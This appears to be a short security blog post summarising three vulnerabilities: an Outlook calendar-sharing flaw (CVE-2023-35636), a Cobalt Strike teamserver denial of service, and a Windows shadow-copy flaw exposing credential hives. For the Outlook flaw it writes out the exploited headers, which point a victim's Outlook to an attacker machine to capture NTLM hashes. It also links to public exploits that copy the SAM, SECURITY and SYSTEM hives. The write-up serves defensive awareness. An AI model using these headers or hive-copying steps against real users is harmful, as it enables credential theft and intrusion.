Dviros (9)

Discovered by Dolev Taler from the Varonis Threat Labs team, CVE-2023-35636 is an exploit of the calendar-sharing function in Microsoft Outlook, whereby adding two headers to an email directs Outlook to share content and contact a designated machine, creating an opportunity to intercept an NTLM v2 hash.

1. An attacker crafts an email invite to the victim, pointing the “.ICS” file path to the attacker-controlled machine. By “listening” to a self-controlled path (domain, IP, folder path, UNC, etc.), the threat actor can obtain connection attempt packets that contain the hash used to access this resource. Many tools are used to perform this listening, and in the example above, Responder.py was used (the go-to tool for every SMB and NTLM hash attack).
   
2. If the victim clicks on the “Open this iCal” button inside the message, their machine will attempt to retrieve the configuration file on the attacker’s machine, exposing the victim’s NTLM hash during authentication.
   

Exploited headers:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics

1. “Content-Class” = “Sharing” — This tells Outlook that this email contains sharing content.
   
2. “x-sharing-config-url” = \(Attacker machine)\a.ics — The second line points the victim’s Outlook to the attacker’s machine.
   

Usually, NTLM v2 should be used when attempting to authenticate against internal IP-address-based services. However, when the NTLM v2 hash is passing through the open internet, it is vulnerable to relay and offline brute-force attacks.

As Cobalt Strike’s source code got leaked in November 2020, it seems that versions 4.2 and 4.3 are both vulnerable to a Denial of Service attack that occurs when a new beacon registers with the Teamserver, thus causing a memory load and server crash.
The attacker need to the know the relevant beacon configuration prior to the execution, but this can be done rather easily with a multitude of tools released over GitHub, that performs config extraction from known Cobalt Strike C2 servers.
Cobalt Strike has become a tool which is used commonly by different threat actor groups worldwide, due to its availability, capabilities and effectiveness in covert channels.

Sentinel One have researched, reported and released a PoC code that triggers this vulnerability:
https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/

As the PoC code got released, it is safe to assume that vulnerable C2 servers worldwide are being attacked.

To fix this issue, version 4.4 was released.

Vulnerability is easy to exploit – by interacting with the local ShadowCopy volume, and copying it to a local folder, attackers can easily elevate their privileges.
Several exploits were already released, allowing to parse the hashes while copying the SAM\SECURITY\SYSTEM hives:
https://github.com/cube0x0/CVE-2021-36934
https://github.com/HuskyHacks/ShadowSteal

This vulnerability occurs due to the permissive “C:\Windows\System32\Config*.*” privileges, “BUILTIN\Users”, allowing any user to read and execute the files.